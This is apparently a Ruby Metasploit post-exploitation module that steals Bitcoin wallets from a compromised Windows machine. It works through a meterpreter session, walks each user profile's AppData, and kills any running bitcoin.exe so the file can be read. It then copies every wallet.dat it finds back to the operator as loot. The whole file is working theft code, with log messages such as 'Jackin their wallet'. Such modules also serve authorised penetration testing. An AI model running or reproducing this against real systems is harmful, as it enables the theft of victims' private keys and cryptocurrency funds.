##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/auxiliary/report'
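class Metasploit3 < Msf::Post

  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::File

  # Module metadata as consumed by the framework.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info={})
    super( update_info( info,
      'Name'         => 'Windows Gather Bitcoin wallet.dat',
      'Description'  => %q{
        This module downloads any Bitcoin wallet.dat files from the target system
      },
      'License'      => MSF_LICENSE,
      'Author'       => [ 'illwill <illwill[at]illmob.org>'],
      'Platform'     => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ]
    ))
  end

  # Entry point: iterate over every user profile returned by
  # grab_user_profiles and hand the expected wallet path under that
  # profile's AppData directory to jack_wallet. Profiles whose 'AppData'
  # entry is nil are skipped.
  #
  # @return [void]
  def run
    print_status("Checking All Users For Bitcoin Wallet...")
    grab_user_profiles.each do |user|
      appdata = user['AppData']
      # Some profiles carry no AppData entry; nothing to look up for those.
      next if appdata.nil?
      jack_wallet("#{appdata}\\Bitcoin\\wallet.dat")
    end
  end

  # Read one wallet file from the session and store it as loot.
  #
  # @param filename [String] remote path of the wallet.dat to collect
  # @return [void]
  def jack_wallet(filename)
    return unless file?(filename)

    print_status("Wallet Found At #{filename}")
    print_status(" Jackin their wallet...")

    # Stop the client first so the file is not held open while it is read.
    kill_bitcoin

    begin
      data = read_file(filename) || ''
    rescue StandardError => e
      # StandardError, not ::Exception: interrupts and framework control
      # exceptions must keep propagating to the caller.
      print_error("Failed to download #{filename}: #{e.class} #{e}")
      return
    end

    if data.empty?
      print_error(" No data found")
      return
    end

    loot_path = store_loot(
      "bitcoin.wallet",
      "application/octet-stream",
      session,
      data,
      filename,
      "Bitcoin Wallet"
    )
    print_status(" Wallet Jacked: #{loot_path}")
  end

  # Terminate any running bitcoin.exe on the session. A failed kill is
  # reported rather than silently ignored, but does not abort collection.
  #
  # @return [void]
  def kill_bitcoin
    client.sys.process.get_processes.each do |proc_info|
      # to_s guards against a process entry with no 'name' value.
      next unless proc_info['name'].to_s.downcase == "bitcoin.exe"

      print_status(" #{proc_info['name']} Process Found...")
      print_status(" Killing Process ID #{proc_info['pid']}...")
      begin
        session.sys.process.kill(proc_info['pid'])
      rescue StandardError => e
        print_error(" Could not kill Process ID #{proc_info['pid']}: #{e.class} #{e}")
      end
    end
  end

end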